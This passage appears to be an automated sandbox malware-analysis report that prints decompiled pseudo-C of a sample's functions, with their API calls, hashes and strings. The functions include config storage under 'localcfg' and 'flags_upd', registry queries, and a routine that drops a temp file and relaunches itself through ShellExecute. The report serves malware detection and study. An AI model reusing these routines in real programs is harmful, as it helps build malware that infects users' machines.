                                                                                • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404280 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x61;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}
















                                                                                0x00404280
                                                                                0x00404290
                                                                                0x00404296
                                                                                0x0040429b
                                                                                0x004042b1
                                                                                0x004042ba
                                                                                0x004043c1
                                                                                0x004043ca
                                                                                0x004043cd
                                                                                0x00000000
                                                                                0x004043ce
                                                                                0x004042c0
                                                                                0x004042c3
                                                                                0x004042c8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004042dc
                                                                                0x004042e6
                                                                                0x00404300
                                                                                0x004043bb
                                                                                0x00000000
                                                                                0x00404318
                                                                                0x00404322
                                                                                0x0040432c
                                                                                0x00404333
                                                                                0x00404336
                                                                                0x00404342
                                                                                0x00404345
                                                                                0x00404350
                                                                                0x00404359
                                                                                0x0040435f
                                                                                0x00404366
                                                                                0x00404371
                                                                                0x00404375
                                                                                0x00404368
                                                                                0x00404368
                                                                                0x00404368
                                                                                0x00404384
                                                                                0x0040438a
                                                                                0x0040439a
                                                                                0x004043ab
                                                                                0x004043ae
                                                                                0x004043b5
                                                                                0x00000000
                                                                                0x004043b5
                                                                                0x00404300
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
                                                                                • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateEvent
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1371578007-2980165447
                                                                                • Opcode ID: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction ID: 96190e95dfac0256a72039fb05246d043f10f1ed4b28fe2ef93a25e2cd6a7057
                                                                                • Opcode Fuzzy Hash: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction Fuzzy Hash: D94181B1900209BADB109BA2CD45FDFBFBCEF40355F104566F604B21C1D7789A51DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02086CC7 Relevance: 10.6, APIs: 7, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02086CE4
                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02086D22
                                                                                • GetLastError.KERNEL32 ref: 02086DA7
                                                                                • CloseHandle.KERNEL32(?), ref: 02086DB5
                                                                                • GetLastError.KERNEL32 ref: 02086DD6
                                                                                • DeleteFileA.KERNEL32(?), ref: 02086DE7
                                                                                • GetLastError.KERNEL32 ref: 02086DFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                • String ID:
                                                                                • API String ID: 3873183294-0
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: fe4433eadbd31d18ee42961d663043fa0a56f98e78af0b2e23499641ddf44b50
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: 3231CE72D00349BFCB01AFA4DC84ADF7FBDEB48210F158475E191E3251E77286849B61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409145 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}









                                                                                0x00409145
                                                                                0x00409166
                                                                                0x00409174
                                                                                0x0040917a
                                                                                0x00409180
                                                                                0x00409181
                                                                                0x004091a9
                                                                                0x004091b6
                                                                                0x004091c9
                                                                                0x004091d3
                                                                                0x00000000
                                                                                0x004091e1
                                                                                0x004091ea

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                • CharToOemA.USER32 ref: 00409174
                                                                                • wsprintfA.USER32 ref: 004091A9
                                                                                  • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                  • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                  • Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                  • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                  • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                  • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3857584221-2980165447
                                                                                • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020893AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 020893C6
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 020893CD
                                                                                • CharToOemA.USER32(?,?), ref: 020893DB
                                                                                • wsprintfA.USER32 ref: 02089410
                                                                                  • Part of subcall function 020892CB: GetTempPathA.KERNEL32(00000400,?), ref: 020892E2
                                                                                  • Part of subcall function 020892CB: wsprintfA.USER32 ref: 02089350
                                                                                  • Part of subcall function 020892CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02089375
                                                                                  • Part of subcall function 020892CB: lstrlen.KERNEL32(?,?,00000000), ref: 02089389
                                                                                  • Part of subcall function 020892CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 02089394
                                                                                  • Part of subcall function 020892CB: CloseHandle.KERNEL32(00000000), ref: 0208939B
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02089448
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3857584221-2980165447
                                                                                • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction ID: 2e060224dcb71bbabad60b893cf483993aae151987f228b44cee016a6e6d59ab
                                                                                • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                • Instruction Fuzzy Hash: 8E015EF69002587BDB21A7619D8DEEF3B7CDB95701F0040A2BB49E2080EAB497C58F75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208AA28 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 247stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: $localcfg
                                                                                • API String ID: 1659193697-2018645984
                                                                                • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction ID: 580edfd530c70db6533a615802e04309f00183adbe2bc6f23c84ccf8a4ece042
                                                                                • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction Fuzzy Hash: C8715B71B00304AADF72BB54DC85FEF3BA99B00718F244027FA85E6890EF7695C4AB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E8A1 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

























                                                                                0x0040e8a1
                                                                                0x0040e8ac
                                                                                0x0040e8af
                                                                                0x0040e8b7
                                                                                0x0040e8c0
                                                                                0x0040e8c3
                                                                                0x0040e8c6
                                                                                0x0040e917
                                                                                0x0040e91a
                                                                                0x0040e932
                                                                                0x0040e93a
                                                                                0x0040e93a
                                                                                0x0040e943
                                                                                0x0040e947
                                                                                0x0040e94a
                                                                                0x0040e96a
                                                                                0x0040e96d
                                                                                0x0040e971
                                                                                0x0040e974
                                                                                0x0040e94c
                                                                                0x0040e94f
                                                                                0x0040e95c
                                                                                0x0040e95f
                                                                                0x0040e962
                                                                                0x0040e965
                                                                                0x0040e965
                                                                                0x0040e979
                                                                                0x0040ea3a
                                                                                0x0040ea4f
                                                                                0x0040ea59
                                                                                0x0040ea5d
                                                                                0x0040ea68
                                                                                0x0040ea6a
                                                                                0x0040ea6d
                                                                                0x0040ea6d
                                                                                0x0040e97f
                                                                                0x0040e985
                                                                                0x0040e98f
                                                                                0x0040e994
                                                                                0x0040e9a1
                                                                                0x0040e9a6
                                                                                0x0040e9b8
                                                                                0x0040e9c0
                                                                                0x0040e9c7
                                                                                0x0040e9dd
                                                                                0x0040ea02
                                                                                0x0040ea0c
                                                                                0x0040ea16
                                                                                0x0040ea19
                                                                                0x0040ea22
                                                                                0x0040ea28
                                                                                0x0040ea28
                                                                                0x0040e994
                                                                                0x0040ea77
                                                                                0x0040ea77
                                                                                0x0040ea83
                                                                                0x0040ea83
                                                                                0x0040e8d1
                                                                                0x0040e8d4
                                                                                0x0040e8d7
                                                                                0x0040e8de
                                                                                0x0040e8ea
                                                                                0x0040e8ed
                                                                                0x0040e8f5
                                                                                0x0040e8fc
                                                                                0x0040e90a
                                                                                0x0040e90c
                                                                                0x0040e911
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                  • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                • String ID: flags_upd$localcfg
                                                                                • API String ID: 204374128-3505511081
                                                                                • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208E8BB Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 96stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0208DF6C: GetCurrentThreadId.KERNEL32 ref: 0208DFBA
                                                                                • lstrcmp.KERNEL32(00410178,00000000), ref: 0208E8FA
                                                                                • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02086128), ref: 0208E950
                                                                                • lstrcmp.KERNEL32(?,00000008), ref: 0208E989
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 2920362961-1846390581
                                                                                • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction ID: 0e130995b376facff2f863763d52b2beeb73cc9b622ce95781bb4352be93b439
                                                                                • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction Fuzzy Hash: EA319E31A00715EBDBB2AF24C884BAB7BE4EB05724F00892AF5D587551D7B0E880EB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02086E0E Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction ID: f6772974e50ec96c48ce860673332e4777531919152353c2b25b63134c9cb243
                                                                                • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction Fuzzy Hash: 7C214D73104219BFDB11BB64FC49EDF3FAEDB49264B118425F542D1091EB71DA40A674
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DD05 Relevance: 9.0, APIs: 6, Instructions: 34threadsleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}





                                                                                0x0040dd17
                                                                                0x0040dd41
                                                                                0x0040dd2c
                                                                                0x0040dd37
                                                                                0x0040dd4c
                                                                                0x0040dd39
                                                                                0x0040dd3b
                                                                                0x00000000
                                                                                0x0040dd3b
                                                                                0x0040dd37
                                                                                0x0040dd53
                                                                                0x0040dd53
                                                                                0x0040dd59
                                                                                0x0040dd62
                                                                                0x0040dd68
                                                                                0x0040dd68
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                • Sleep.KERNEL32(00000000,?,74CB43E0,?,00000000,0040E538,?,74CB43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 3819781495-0
                                                                                • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208C543 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 182threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0208C6B4
                                                                                • InterlockedIncrement.KERNEL32(0208C74B), ref: 0208C715
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0208C747), ref: 0208C728
                                                                                • CloseHandle.KERNEL32(00000000,?,0208C747,00413588,02088A77), ref: 0208C733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 1026198776-1857712256
                                                                                • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction ID: ad7802854727092c5cb676bd010c12dd24aeb8aea43383852e170b006bc2d0f2
                                                                                • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction Fuzzy Hash: 3E515DB1A00B418FE768AF29C58462BBBF9FB48304B50593FE18BC7A90D774E440DB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004080C9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				CHAR _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
